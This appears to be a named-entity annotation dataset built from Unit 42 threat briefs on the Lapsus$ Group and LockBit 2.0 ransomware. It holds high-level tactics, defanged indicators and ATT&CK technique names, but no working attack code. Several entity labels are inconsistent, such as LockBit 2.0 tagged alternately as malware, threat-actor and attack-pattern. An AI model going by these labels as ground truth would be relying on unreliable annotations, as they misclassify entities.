sphere.","entities":[{"id":45606,"label":"location","start_offset":12,"end_offset":23},{"id":45608,"label":"identity","start_offset":43,"end_offset":56},{"id":45609,"label":"identity","start_offset":59,"end_offset":71},{"id":45610,"label":"location","start_offset":109,"end_offset":122}],"relations":[{"id":357,"from_id":45608,"to_id":45606,"type":"located-at"},{"id":358,"from_id":45609,"to_id":45606,"type":"located-at"},{"id":359,"from_id":45609,"to_id":45608,"type":"related-to"}],"Comments":[]} {"id":2599,"text":"It is likely that some victims are not the intended end-target, but are rather breached in order to gain access to their customers, or for example, to help bypass multi-factor authentication (MFA).","entities":[],"relations":[],"Comments":[]} {"id":2600,"text":"To this end, we are aware of this actor’s involvement in vishing, SIM-swapping and soliciting third parties at providers for insider access.","entities":[],"relations":[],"Comments":[]} {"id":2601,"text":"For example, in the “proof” of the Okta breach posted on the Lapsus$ Group’s Telegram channel, the actor states: “… our focus was ONLY on okta customers” (Figure 3)","entities":[{"id":45614,"label":"identity","start_offset":138,"end_offset":142},{"id":45611,"label":"identity","start_offset":35,"end_offset":39},{"id":45612,"label":"threat-actor","start_offset":61,"end_offset":68},{"id":45613,"label":"SOFTWARE","start_offset":77,"end_offset":85}],"relations":[{"id":360,"from_id":45612,"to_id":45611,"type":"targets"}],"Comments":[]} {"id":2602,"text":"Several of the Lapsus$ Group’s attacks involved the theft and publication of source code.","entities":[{"id":47790,"label":"threat-actor","start_offset":15,"end_offset":22}],"relations":[],"Comments":[]} {"id":2603,"text":"In the case of Nvidia, it was observed as a non-financial extortion attempt.","entities":[{"id":47791,"label":"identity","start_offset":15,"end_offset":21}],"relations":[],"Comments":[]} {"id":2604,"text":"In other cases, for example that of Microsoft, there was simply publication without extortion, again supporting the understanding that the primary motivation of this actor is notoriety rather than financial gain.","entities":[{"id":45615,"label":"identity","start_offset":36,"end_offset":45}],"relations":[],"Comments":[]} {"id":2605,"text":" However, as notoriety and success cause this group to grow, we should expect to see diversity of membership reflected in a diversity of victimology, TTPs and action-on-objective motivations.","entities":[],"relations":[],"Comments":[]} {"id":2606,"text":" Owing to the diversity of techniques used, and the lack of use of malware, there is no single defense against or detection of Lapsus$ attacks specifically. ","entities":[{"id":7883,"label":"threat-actor","start_offset":127,"end_offset":134}],"relations":[],"Comments":[]} {"id":2607,"text":"A hallmark of this group is the diversity of techniques used both for initial access and action-on-objective.","entities":[],"relations":[],"Comments":[]} {"id":2608,"text":"Credentials are harvested from dumps, purchased or spear-phished.","entities":[],"relations":[],"Comments":[]} {"id":2609,"text":"When employed, various techniques to bypass MFA are observed – from social engineering, through SIM-swapping and even compromising MFA\/telecoms providers. Zero Trust network architecture and strong security hygiene are the best defenses against this type of threat actor.","entities":[],"relations":[],"Comments":[]} {"id":2610,"text":"If Lapsus$ has purchased credentials for a network, they can effectively operate as an insider threat, taking advantage of the same privileges the employee has inside the network. Focus on general information security best practices: MFA, access controls and network segmentation.","entities":[{"id":47792,"label":"threat-actor","start_offset":3,"end_offset":10}],"relations":[],"Comments":[]} {"id":2611,"text":"Ensure your organization has the ability to detect anomalous activity, including activity that involves trusted third parties in your environments, and protect against non-technical techniques such as vishing and SIM-swapping.","entities":[],"relations":[],"Comments":[]} {"id":2612,"text":"Patching of internal systems that might support lateral movement and privilege escalation should be prioritized, as well as against known public exploits that these actors might employ.","entities":[{"id":47793,"label":"attack-pattern","start_offset":69,"end_offset":89}],"relations":[],"Comments":[]} {"id":2613,"text":" Although the commodity malware RedLine Stealer has been implicated for credential harvesting in some attacks, it’s unclear if this is first- or third-party, and it cannot be used as a definitive indicator of Lapsus$-specific activity.","entities":[{"id":45617,"label":"malware","start_offset":32,"end_offset":47},{"id":45618,"label":"attack-pattern","start_offset":72,"end_offset":93},{"id":45619,"label":"threat-actor","start_offset":209,"end_offset":216}],"relations":[{"id":109,"from_id":45618,"to_id":45617,"type":"delivers"}],"Comments":[]} {"id":2614,"text":" Lapsus$ Group has made headlines recently for high-profile attacks, with an apparent goal of gaining notoriety.","entities":[{"id":47794,"label":"threat-actor","start_offset":1,"end_offset":8}],"relations":[],"Comments":[]} {"id":2615,"text":"They claim in some cases to have targeted organizations with the specific goal of gaining access to customers.","entities":[],"relations":[],"Comments":[]} {"id":2616,"text":" While referred to as a ransomware group in many reports, the Lapsus$ Group is more accurately called an attack group.","entities":[{"id":45620,"label":"threat-actor","start_offset":62,"end_offset":69}],"relations":[],"Comments":[]} {"id":2617,"text":"Most notably, their focus to date does not appear to have been on extortion and financial gain.","entities":[],"relations":[],"Comments":[]} {"id":2618,"text":"Even without extortion, the group’s attacks and leaks of stolen information can be damaging.","entities":[],"relations":[],"Comments":[]} {"id":2619,"text":" Because the group uses a diversity of techniques for attacks, no single technique can protect against Lapsus$ or detect its attacks.","entities":[{"id":45621,"label":"threat-actor","start_offset":103,"end_offset":110}],"relations":[],"Comments":[]} {"id":2620,"text":"Because of this, we recommend that organizations focus on observing general information security best practices as described in the Mitigation Actions section above.","entities":[],"relations":[],"Comments":[]} {"id":2621,"text":" Unit 42, together with researchers at Unit 221b, identified the primary actor behind the Lapsus$ Group moniker in 2021, and have been assisting law enforcement in their efforts to prosecute this group.","entities":[{"id":47795,"label":"identity","start_offset":1,"end_offset":8},{"id":47796,"label":"identity","start_offset":39,"end_offset":48},{"id":47798,"label":"TIME","start_offset":115,"end_offset":119},{"id":47797,"label":"threat-actor","start_offset":90,"end_offset":97}],"relations":[],"Comments":[]} {"id":2622,"text":" If you think you may be subject to an active attack or have an urgent matter, get in touch with the Unit 42 Incident Response team or call North America Toll-Free: 866.486.4842 (866.4.UNIT42), EMEA: +31.20.299.3130, APAC: +65.6983.8730, or Japan: +81.50.1790.0200.","entities":[{"id":45625,"label":"location","start_offset":241,"end_offset":246},{"id":45627,"label":"location","start_offset":217,"end_offset":221},{"id":45624,"label":"location","start_offset":140,"end_offset":153},{"id":45626,"label":"location","start_offset":194,"end_offset":198},{"id":45623,"label":"identity","start_offset":101,"end_offset":131}],"relations":[],"Comments":[]} {"id":2623,"text":" Palo Alto Networks will update this Threat Brief with new information and recommendations as they become available. DEV-0537 criminal actor targeting organizations for data exfiltration and destruction A Closer Look","entities":[{"id":47799,"label":"identity","start_offset":1,"end_offset":19},{"id":47800,"label":"threat-actor","start_offset":118,"end_offset":126}],"relations":[],"Comments":[]} {"id":2624,"text":"the","entities":[],"relations":[],"Comments":[]} {"id":2625,"text":"LAPSUS$","entities":[{"id":45628,"label":"threat-actor","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} {"id":2626,"text":"Data Extortion Group Lapsus$ Telegram channel: t[.]me\/minsaudebr","entities":[{"id":47801,"label":"URL","start_offset":47,"end_offset":64},{"id":7950,"label":"threat-actor","start_offset":21,"end_offset":28}],"relations":[],"Comments":[]} {"id":2627,"text":"Email address associated with Lapsus$ Group: saudegroup[at]ctemplar[.]com Updated March 25, 2022, at 8:30 a.m. PT.","entities":[{"id":47803,"label":"EMAIL","start_offset":45,"end_offset":73},{"id":47802,"label":"TIME","start_offset":83,"end_offset":114},{"id":7951,"label":"threat-actor","start_offset":30,"end_offset":37}],"relations":[],"Comments":[]} {"id":2628,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":2629,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":2630,"text":"This post is also available in: 日本語 (Japanese) LockBit 2.0 is ransomware as a service (RaaS) that first emerged in June 2021 as an upgrade to its predecessor LockBit (aka ABCD Ransomware), which was first observed in September 2019.","entities":[{"id":47805,"label":"TIME","start_offset":121,"end_offset":130},{"id":47806,"label":"malware","start_offset":164,"end_offset":171},{"id":47808,"label":"TIME","start_offset":223,"end_offset":237},{"id":47804,"label":"malware","start_offset":53,"end_offset":64},{"id":47807,"label":"malware","start_offset":177,"end_offset":192}],"relations":[{"id":361,"from_id":47804,"to_id":47806,"type":"variant-of"},{"id":363,"from_id":47807,"to_id":47806,"type":"duplicate-of"}],"Comments":[]} {"id":2631,"text":"Since its inception, the LockBit 2.0 RaaS attracted affiliates via recruitment campaigns in underground forums, and thus became particularly prolific during the third quarter of calendar year 2021.","entities":[{"id":45629,"label":"malware","start_offset":25,"end_offset":36},{"id":45630,"label":"TIME","start_offset":192,"end_offset":196}],"relations":[],"Comments":[]} {"id":2632,"text":"The LockBit 2.0 operators claimed to have the fastest encryption software of any active ransomware strain as of June 2021, claiming accordingly that this added to its effectiveness and ability to disrupt the ransomware landscape.","entities":[{"id":47809,"label":"TIME","start_offset":112,"end_offset":121},{"id":7968,"label":"threat-actor","start_offset":4,"end_offset":11}],"relations":[],"Comments":[]} {"id":2633,"text":" While several top-tier RaaS affiliate programs, such as Babuk, DarkSide and REvil (aka Sodinokibi) disappeared from the underground in 2021, LockBit 2.0 continued to operate and gradually became one of the most active ransomware operations.","entities":[{"id":47813,"label":"threat-actor","start_offset":88,"end_offset":98},{"id":47810,"label":"threat-actor","start_offset":57,"end_offset":62},{"id":47811,"label":"threat-actor","start_offset":64,"end_offset":72},{"id":47812,"label":"threat-actor","start_offset":77,"end_offset":82},{"id":47814,"label":"TIME","start_offset":136,"end_offset":140},{"id":47815,"label":"malware","start_offset":142,"end_offset":153}],"relations":[{"id":364,"from_id":47813,"to_id":47812,"type":"variant-of"}],"Comments":[]} {"id":2634,"text":"While Conti was recognized as being the most prolific ransomware deployed in 2021 per our 2022 Unit 42 Ransomware Threat Report, LockBit 2.0 is the most impactful and widely deployed ransomware variant we have observed in all ransomware breaches during the first quarter of 2022, considering both leak site data and data from cases handled by Unit 42 incident responders.","entities":[{"id":45633,"label":"TIME","start_offset":77,"end_offset":81},{"id":45632,"label":"identity","start_offset":95,"end_offset":102},{"id":45635,"label":"TIME","start_offset":90,"end_offset":94},{"id":45636,"label":"malware","start_offset":129,"end_offset":140},{"id":45637,"label":"TIME","start_offset":257,"end_offset":278},{"id":45631,"label":"threat-actor","start_offset":6,"end_offset":11},{"id":45638,"label":"identity","start_offset":343,"end_offset":350}],"relations":[],"Comments":[]} {"id":2635,"text":" According to data analysis of ransomware groups’ dark web leak sites, LockBit 2.0 was the most impactful RaaS for five consecutive months.","entities":[{"id":47816,"label":"malware","start_offset":71,"end_offset":82}],"relations":[],"Comments":[]} {"id":2636,"text":"As of May 25, LockBit 2.0 accounted for 46% of all ransomware-related breach events for 2022.","entities":[{"id":47817,"label":"TIME","start_offset":6,"end_offset":12},{"id":47818,"label":"malware","start_offset":14,"end_offset":25},{"id":47819,"label":"TIME","start_offset":88,"end_offset":92}],"relations":[],"Comments":[]} {"id":2637,"text":"And the LockBit 2.0 RaaS leak site has the most significant number of published victims, with over 850 in total.","entities":[{"id":45639,"label":"threat-actor","start_offset":8,"end_offset":19}],"relations":[],"Comments":[]} {"id":2638,"text":" Additionally, LockBit 2.0 has affected many companies globally, with top victims based in the U.S., Italy and Germany.","entities":[{"id":47820,"label":"malware","start_offset":15,"end_offset":26},{"id":47821,"label":"location","start_offset":95,"end_offset":99},{"id":47822,"label":"location","start_offset":101,"end_offset":106},{"id":47823,"label":"location","start_offset":111,"end_offset":118}],"relations":[],"Comments":[]} {"id":2639,"text":"Its most highly targeted industry verticals include professional services, construction, wholesale and retail, and manufacturing.","entities":[],"relations":[],"Comments":[]} {"id":2640,"text":" Palo Alto Networks customers receive protections against LockBit 2.0 attacks from Cortex XDR, as well as from the WildFire cloud-delivered security subscription for the Next-Generation Firewall.","entities":[{"id":47824,"label":"malware","start_offset":58,"end_offset":69},{"id":45640,"label":"identity","start_offset":1,"end_offset":19},{"id":45642,"label":"SOFTWARE","start_offset":83,"end_offset":93},{"id":45643,"label":"SOFTWARE","start_offset":115,"end_offset":123}],"relations":[],"Comments":[]} {"id":2641,"text":"(Please see the Conclusion section for more detail.) LockBit 2.0 Overview Victimology Leak Site Data Unit 42 Incident Response Data on LockBit 2.0 LockBit 2.0 Tactics, Techniques and Procedures LockBit 2.0 Technical Details LockBit 3.0 Courses of Action Conclusion","entities":[{"id":47828,"label":"malware","start_offset":148,"end_offset":159},{"id":47825,"label":"malware","start_offset":54,"end_offset":65},{"id":47826,"label":"identity","start_offset":102,"end_offset":109},{"id":47827,"label":"malware","start_offset":136,"end_offset":147},{"id":47829,"label":"malware","start_offset":195,"end_offset":206},{"id":47830,"label":"malware","start_offset":225,"end_offset":236}],"relations":[],"Comments":[]} {"id":2642,"text":"Appendix A Additional Resources","entities":[],"relations":[],"Comments":[]} {"id":2643,"text":" LockBit 2.0 is another example of RaaS that leverages double extortion techniques as part of the attack to pressure victims into paying the ransom.","entities":[{"id":45644,"label":"malware","start_offset":1,"end_offset":12}],"relations":[],"Comments":[]} {"id":2644,"text":" In some cases, LockBit 2.0 operators have performed DDoS attacks on the victims' infrastructure as well as using a leak site.","entities":[{"id":47831,"label":"malware","start_offset":16,"end_offset":27},{"id":47832,"label":"attack-pattern","start_offset":53,"end_offset":65}],"relations":[],"Comments":[]} {"id":2645,"text":"This practice is known as triple extortion, a tactic observed in groups like BlackCat, Avaddon and SunCrypt in the past.","entities":[{"id":47833,"label":"threat-actor","start_offset":77,"end_offset":85},{"id":47834,"label":"threat-actor","start_offset":87,"end_offset":94},{"id":47835,"label":"threat-actor","start_offset":99,"end_offset":107}],"relations":[],"Comments":[]} {"id":2646,"text":" Like other ransomware families such as BlackByte, LockBit 2.0 avoids systems that use Eastern European languages, including many written with Cyrillic alphabets.","entities":[{"id":45646,"label":"malware","start_offset":51,"end_offset":62},{"id":45645,"label":"malware","start_offset":40,"end_offset":49}],"relations":[],"Comments":[]} {"id":2647,"text":" Unlike other RaaS programs that don't require the affiliates to be super technical or savvy, LockBit 2.0 operators allegedly only work with experienced penetration testers, especially those experienced with tools like Metasploit and Cobalt Strike.","entities":[{"id":47837,"label":"tools","start_offset":219,"end_offset":229},{"id":47838,"label":"tools","start_offset":234,"end_offset":247},{"id":47836,"label":"threat-actor","start_offset":94,"end_offset":105}],"relations":[],"Comments":[]} {"id":2648,"text":"Affiliates are tasked with gaining initial access to the victim network, allowing LockBit 2.0 to conduct the rest of the attack.","entities":[{"id":47839,"label":"threat-actor","start_offset":82,"end_offset":93}],"relations":[],"Comments":[]} {"id":2649,"text":" LockBit 2.0 has been observed changing infected computers’ backgrounds to a ransomware note.","entities":[{"id":45647,"label":"threat-actor","start_offset":1,"end_offset":12}],"relations":[],"Comments":[]} {"id":2650,"text":"The ransomware note was also used to recruit insiders from victim organizations.","entities":[],"relations":[],"Comments":[]} {"id":2651,"text":"The notes claimed the threat actors would pay “millions of dollars” to insiders who provided access to corporate networks or facilitated a ransomware infection by opening a phishing email and\/or launching a payload manually.","entities":[{"id":47840,"label":"attack-pattern","start_offset":173,"end_offset":187}],"relations":[],"Comments":[]} {"id":2652,"text":"The threat actors also expressed interest in other access methods such as RDP, VPN and corporate email credentials.","entities":[{"id":47841,"label":"SOFTWARE","start_offset":74,"end_offset":77},{"id":47842,"label":"SOFTWARE","start_offset":79,"end_offset":82}],"relations":[],"Comments":[]} {"id":2653,"text":"In exchange, they offer a cut of the paid ransom.","entities":[],"relations":[],"Comments":[]} {"id":2654,"text":" LockBit 2.0 targets organizations opportunistically.","entities":[{"id":47843,"label":"threat-actor","start_offset":1,"end_offset":12}],"relations":[],"Comments":[]} {"id":2655,"text":"The operators work with initial access brokers to save time and allow for a larger profit potential.","entities":[],"relations":[],"Comments":[]} {"id":2656,"text":"While typically seeking victims of opportunity, LockBit 2.0 does appear to have victim limitations.","entities":[{"id":47844,"label":"threat-actor","start_offset":48,"end_offset":59}],"relations":[],"Comments":[]} {"id":2657,"text":"The group announced that they would not target healthcare facilities, social services, educational institutions, charitable organizations and other organizations that “contribute to the survival of the human race”.","entities":[],"relations":[],"Comments":[]} {"id":2658,"text":"However, despite these claims, there have been instances of affiliates undermining these guidelines by still opting to attack industry verticals such as healthcare and education.","entities":[],"relations":[],"Comments":[]} {"id":2659,"text":" Organizations in Europe and the U.S. are hit more often by LockBit 2.0 than those in other countries, likely due to the high profitability and insurance payouts.","entities":[{"id":47846,"label":"location","start_offset":33,"end_offset":37},{"id":47847,"label":"threat-actor","start_offset":60,"end_offset":71},{"id":47845,"label":"location","start_offset":18,"end_offset":24}],"relations":[],"Comments":[]} {"id":2660,"text":" During the first calendar year quarter of 2022, LockBit 2.0 persisted as the most impactful and the most deployed ransomware variant we observed in all ransomware breaches shared on leak sites.","entities":[{"id":47849,"label":"threat-actor","start_offset":49,"end_offset":60},{"id":47848,"label":"TIME","start_offset":12,"end_offset":47}],"relations":[],"Comments":[]} {"id":2661,"text":" According to leak site data analysis, LockBit 2.0 was the most impactful RaaS for five consecutive months.","entities":[{"id":45651,"label":"threat-actor","start_offset":39,"end_offset":50}],"relations":[],"Comments":[]} {"id":2662,"text":"As of May 25, LockBit 2.0 accounted for 46% of all ransomware-related breach events for 2022 shared on leak sites.","entities":[{"id":47850,"label":"TIME","start_offset":6,"end_offset":12},{"id":47851,"label":"threat-actor","start_offset":14,"end_offset":25},{"id":47852,"label":"TIME","start_offset":88,"end_offset":92}],"relations":[],"Comments":[]} {"id":2663,"text":" Additionally, the LockBit 2.0 RaaS leak site has the most significant number of published victims, with over 850 in total.","entities":[{"id":47853,"label":"threat-actor","start_offset":19,"end_offset":30}],"relations":[],"Comments":[]} {"id":2664,"text":"The site itself typically features information such as victim domains, a time tracker and measures of how much data was compromised.","entities":[],"relations":[],"Comments":[]} {"id":2665,"text":" LockBit 2.0 claims that they have demanded ransom from at least 12,125 companies, as shown in the figure below.","entities":[{"id":47854,"label":"threat-actor","start_offset":1,"end_offset":12}],"relations":[],"Comments":[]} {"id":2666,"text":" According to leak site data for LockBit 2.0, since its inception in June 2021, the RaaS has affected many companies globally, with top victims based in the U.S., Italy and Germany. LockBit 2.0 has also impacted various victims across multiple industry verticals.","entities":[{"id":47855,"label":"threat-actor","start_offset":33,"end_offset":44},{"id":47858,"label":"location","start_offset":163,"end_offset":168},{"id":47860,"label":"threat-actor","start_offset":183,"end_offset":194},{"id":47856,"label":"TIME","start_offset":69,"end_offset":78},{"id":47857,"label":"location","start_offset":157,"end_offset":161},{"id":47859,"label":"location","start_offset":173,"end_offset":180}],"relations":[],"Comments":[]} {"id":2667,"text":"Its most highly targeted industry verticals include professional services, construction, wholesale and retail and manufacturing.","entities":[],"relations":[],"Comments":[]} {"id":2668,"text":" When looking at leak site data across all ransomware families, we’ve observed LockBit 2.0 targeting the highest number of organizations in the following regions: JAPAC, EMEA, and LATAM.","entities":[{"id":47862,"label":"location","start_offset":163,"end_offset":168},{"id":47863,"label":"location","start_offset":170,"end_offset":174},{"id":47864,"label":"location","start_offset":180,"end_offset":185},{"id":47861,"label":"threat-actor","start_offset":79,"end_offset":90}],"relations":[],"Comments":[]} {"id":2669,"text":" Cases handled by Unit 42 security consultants involving LockBit 2.0 since its appearance in June 2021 demonstrate shorter dwell times and less flexibility in negotiation in the beginning of FY 2022 (measured October-September) in comparison to the end of FY 2021.","entities":[{"id":47869,"label":"TIME","start_offset":209,"end_offset":226},{"id":47868,"label":"TIME","start_offset":191,"end_offset":198},{"id":47865,"label":"identity","start_offset":18,"end_offset":25},{"id":47866,"label":"threat-actor","start_offset":57,"end_offset":68},{"id":47867,"label":"TIME","start_offset":93,"end_offset":102},{"id":47870,"label":"TIME","start_offset":256,"end_offset":263}],"relations":[],"Comments":[]} {"id":2670,"text":"The following data is broken into fiscal years and quarters based on when the threat actor breached the network, not when the activity was noticed by a client.","entities":[],"relations":[],"Comments":[]} {"id":2671,"text":" LockBit 2.0 has shown a decrease in dwell time in FY 2022.","entities":[{"id":47872,"label":"TIME","start_offset":51,"end_offset":58},{"id":47871,"label":"threat-actor","start_offset":1,"end_offset":12}],"relations":[],"Comments":[]} {"id":2672,"text":"From the last two quarters of FY 2021 to the first two quarters of FY 2022, there has been an average 37-day difference. ","entities":[{"id":47873,"label":"TIME","start_offset":30,"end_offset":37},{"id":47874,"label":"TIME","start_offset":67,"end_offset":74}],"relations":[],"Comments":[]} {"id":2673,"text":"The difference in initial and final ransom demands over the past fiscal year has been converted to percentages and then averaged.","entities":[],"relations":[],"Comments":[]} {"id":2674,"text":"The graph below demonstrates that at the end of FY 2021, threat actors using LockBit 2.0 were much more open to negotiations of ransom amounts; during that time the ransom was dropped approximately 83% from the initial ask on average.","entities":[{"id":47875,"label":"TIME","start_offset":48,"end_offset":55},{"id":47876,"label":"threat-actor","start_offset":77,"end_offset":88}],"relations":[],"Comments":[]} {"id":2675,"text":"In comparison, we see less flexibility in FY 2022 Q1 and Q3 – threat actors only offered an average of about 30% as a price drop.","entities":[{"id":47877,"label":"TIME","start_offset":42,"end_offset":59}],"relations":[],"Comments":[]} {"id":2676,"text":"FY 2022 Q2 is not included due to lack of sufficient information.","entities":[{"id":47878,"label":"TIME","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} {"id":2677,"text":" Technically speaking, we have observed LockBit 2.0 affiliates leveraging the following tactics, techniques and procedures: Windows SysInternals PsExec has been utilized for both persistence and execution purposes.","entities":[{"id":47880,"label":"threat-actor","start_offset":40,"end_offset":51},{"id":47879,"label":"tools","start_offset":125,"end_offset":152}],"relations":[{"id":365,"from_id":47880,"to_id":47879,"type":"uses"}],"Comments":[]} {"id":2678,"text":"Its ability to execute processes on other systems spread the ransomware and assisted in reconnaissance activities.","entities":[],"relations":[],"Comments":[]} {"id":2679,"text":" LockBit 2.0 was developed using the Assembly and Origin C programming languages and leverages advanced encryption standard (AES) and elliptic-curve cryptography (ECC) algorithms to encrypt victim data.","entities":[{"id":47881,"label":"threat-actor","start_offset":2,"end_offset":13}],"relations":[],"Comments":[]} {"id":2680,"text":"It can affect both Windows and Linux OS, as the operator released a Linux version of LockBit 2.0 to target VMware ESXi hypervisor systems in October 2021, coded exclusively in the C programming language.","entities":[{"id":47882,"label":"SOFTWARE","start_offset":19,"end_offset":26},{"id":47883,"label":"SOFTWARE","start_offset":31,"end_offset":39},{"id":47884,"label":"SOFTWARE","start_offset":68,"end_offset":73},{"id":47886,"label":"SOFTWARE","start_offset":107,"end_offset":118},{"id":47887,"label":"TIME","start_offset":141,"end_offset":153},{"id":47885,"label":"threat-actor","start_offset":85,"end_offset":97}],"relations":[],"Comments":[]} {"id":2681,"text":" The LockBit group claimed that LockBit 2.0 is “the fastest encryption software all over the world” and provided a comparative table showing the encryption speed of various ransomware samples. LockBit 2.0 also contains a self-spreading feature, clears logs and can print the ransom note on network printers until the paper runs out. A management panel that affiliates can use to manage victims and affiliate accounts, generate new ransomware builds and generate the decryptor if the demanded ransom is paid also exists.","entities":[{"id":47888,"label":"threat-actor","start_offset":5,"end_offset":12},{"id":47889,"label":"malware","start_offset":32,"end_offset":43},{"id":47890,"label":"threat-actor","start_offset":194,"end_offset":205}],"relations":[{"id":367,"from_id":47889,"to_id":47888,"type":"authored-by"}],"Comments":[]} {"id":2682,"text":"LockBit 2.0 operators also released an information-stealer dubbed StealBit, which was developed to support affiliates of the LockBit 2.0 RaaS when exfiltrating data from breached companies.","entities":[{"id":45655,"label":"malware","start_offset":66,"end_offset":74},{"id":45654,"label":"threat-actor","start_offset":0,"end_offset":11},{"id":45656,"label":"threat-actor","start_offset":125,"end_offset":136}],"relations":[{"id":111,"from_id":45655,"to_id":45654,"type":"authored-by"}],"Comments":[]} {"id":2683,"text":" StealBit contains the following capabilities:","entities":[{"id":47891,"label":"malware","start_offset":1,"end_offset":9}],"relations":[],"Comments":[]} {"id":2684,"text":" The operator of LockBit 2.0 has provided a comparative table speed showing the information stealer compared to other tools.","entities":[{"id":47892,"label":"threat-actor","start_offset":17,"end_offset":28},{"id":47893,"label":"attack-pattern","start_offset":80,"end_offset":99}],"relations":[],"Comments":[]} {"id":2685,"text":" There was a bug that existed in LockBit 2.0 that allowed researchers to revert the encryption process on an MSSQL database.","entities":[{"id":47894,"label":"SOFTWARE","start_offset":109,"end_offset":114},{"id":45657,"label":"threat-actor","start_offset":32,"end_offset":44}],"relations":[],"Comments":[]} {"id":2686,"text":"After the bug’s disclosure, LockBit forum members discussed how the bug will not exist in LockBit’s next iteration.","entities":[{"id":47895,"label":"threat-actor","start_offset":28,"end_offset":49},{"id":8199,"label":"malware","start_offset":90,"end_offset":97}],"relations":[],"Comments":[]} {"id":2687,"text":"Moreover, on March 17, LockBit forum members mentioned the release of LockBit’s next version in one or two weeks.","entities":[{"id":47896,"label":"TIME","start_offset":13,"end_offset":21},{"id":8201,"label":"malware","start_offset":23,"end_offset":30},{"id":8202,"label":"malware","start_offset":70,"end_offset":77}],"relations":[],"Comments":[]} {"id":2688,"text":"On March 25, VX underground posted a tweet with details of this new version, dubbed LockBit Black.","entities":[{"id":45658,"label":"identity","start_offset":13,"end_offset":27},{"id":45659,"label":"TIME","start_offset":3,"end_offset":11},{"id":45661,"label":"malware","start_offset":84,"end_offset":97}],"relations":[],"Comments":[]} {"id":2689,"text":" Several adversarial techniques were observed in this activity and the following measures are suggested within Palo Alto Networks products and services to ensure mitigation of threats related to LockBit 2.0 ransomware, as well as other malware using similar techniques: Exploit Public-Facing Application [T1190], Command and Scripting Interpreter [T1059], Local Account [T1136.001], Web Shell [T1505.003], Exploitation for Privilege Escalation [T1068], Indicator Removal on Host [T1070], Deobfuscate\/Decode Files or Information [T1140], Disable or Modify Tools [T1562.001], Hidden Window [T1564.003], Valid Accounts [T1078], External Remote Services [T1133], Scheduled Task [T1053.005], Bypass User Account Control [T1548.002], Group Policy Modification [T1484.001] OS Credential Dumping [T1003], Credentials from Password Stores [T1555] Network Service Scanning [T1046], Process Discovery [T1057], System Location Discovery [T1614], System Information Discovery [T1082] Remote Services [T1021], SMB\/Windows Admin Shares [T1021.002] Remote Access Software [T1219] Data Transfer Size Limits [T1030], Exfiltration Over C2 Channel [T1041] Data Encrypted for Impact [T1486], Service Stop [T1489] †These capabilities are part of the NGFW security subscriptions service","entities":[{"id":47897,"label":"identity","start_offset":111,"end_offset":129},{"id":47898,"label":"threat-actor","start_offset":195,"end_offset":206},{"id":47899,"label":"attack-pattern","start_offset":271,"end_offset":312},{"id":47901,"label":"attack-pattern","start_offset":357,"end_offset":382},{"id":47910,"label":"attack-pattern","start_offset":729,"end_offset":766},{"id":47911,"label":"attack-pattern","start_offset":799,"end_offset":839},{"id":47913,"label":"attack-pattern","start_offset":875,"end_offset":900},{"id":47914,"label":"attack-pattern","start_offset":937,"end_offset":973},{"id":47915,"label":"attack-pattern","start_offset":975,"end_offset":998},{"id":47918,"label":"attack-pattern","start_offset":1105,"end_offset":1141},{"id":47919,"label":"attack-pattern","start_offset":1143,"end_offset":1176},{"id":47922,"label":"attack-pattern","start_offset":902,"end_offset":935},{"id":47923,"label":"attack-pattern","start_offset":1038,"end_offset":1068},{"id":47924,"label":"attack-pattern","start_offset":1178,"end_offset":1198},{"id":47900,"label":"attack-pattern","start_offset":314,"end_offset":355},{"id":47902,"label":"attack-pattern","start_offset":407,"end_offset":452},{"id":47903,"label":"attack-pattern","start_offset":454,"end_offset":487},{"id":47904,"label":"attack-pattern","start_offset":538,"end_offset":573},{"id":47905,"label":"attack-pattern","start_offset":575,"end_offset":600},{"id":47906,"label":"attack-pattern","start_offset":602,"end_offset":624},{"id":47907,"label":"attack-pattern","start_offset":626,"end_offset":658},{"id":47908,"label":"attack-pattern","start_offset":660,"end_offset":686},{"id":47909,"label":"attack-pattern","start_offset":688,"end_offset":727},{"id":47912,"label":"attack-pattern","start_offset":841,"end_offset":873},{"id":47916,"label":"attack-pattern","start_offset":1000,"end_offset":1036},{"id":47917,"label":"attack-pattern","start_offset":1070,"end_offset":1103},{"id":47920,"label":"attack-pattern","start_offset":384,"end_offset":405},{"id":47921,"label":"attack-pattern","start_offset":489,"end_offset":536},{"id":47925,"label":"attack-pattern","start_offset":768,"end_offset":797}],"relations":[],"Comments":[]} {"id":2690,"text":"Note: This is not an all-inclusive list of the protections provided by Palo Alto Networks.","entities":[{"id":8237,"label":"identity","start_offset":71,"end_offset":89}],"relations":[],"Comments":[]} {"id":2691,"text":"This is a subset of our current Courses of Action initiative and will be updated as the project progresses.","entities":[],"relations":[],"Comments":[]} {"id":2692,"text":" LockBit 2.0 and its evolution over time is a perfect example to illustrate the persistence, increasing complexity and impact brought by the ransomware landscape as a whole.","entities":[{"id":47926,"label":"attack-pattern","start_offset":2,"end_offset":13}],"relations":[],"Comments":[]} {"id":2693,"text":"With claims of this RaaS offering the fastest encryption on the ransomware market, coupled with the fact that it has been delivered in high volume by experienced affiliates, this RaaS poses a significant threat.","entities":[],"relations":[],"Comments":[]} {"id":2694,"text":"LockBit’s continuation with operations and its next iteration coming up on the horizon means that organizations and their security teams need to stay vigilant in the ever-evolving threat landscape.","entities":[{"id":47927,"label":"threat-actor","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} {"id":2695,"text":"Palo Alto Networks detects and prevents LockBit 2.0 ransomware in the following ways:","entities":[{"id":47928,"label":"identity","start_offset":0,"end_offset":18},{"id":47929,"label":"threat-actor","start_offset":40,"end_offset":51}],"relations":[],"Comments":[]} {"id":2696,"text":" If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call: Palo Alto Networks has shared these findings, including file samples and indicators of compromise, with our fellow Cyber Threat Alliance members.","entities":[{"id":47932,"label":"identity","start_offset":248,"end_offset":269},{"id":47930,"label":"identity","start_offset":92,"end_offset":99},{"id":47931,"label":"identity","start_offset":133,"end_offset":151}],"relations":[],"Comments":[]} {"id":2697,"text":"CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors.","entities":[{"id":45663,"label":"identity","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":2698,"text":"Learn more 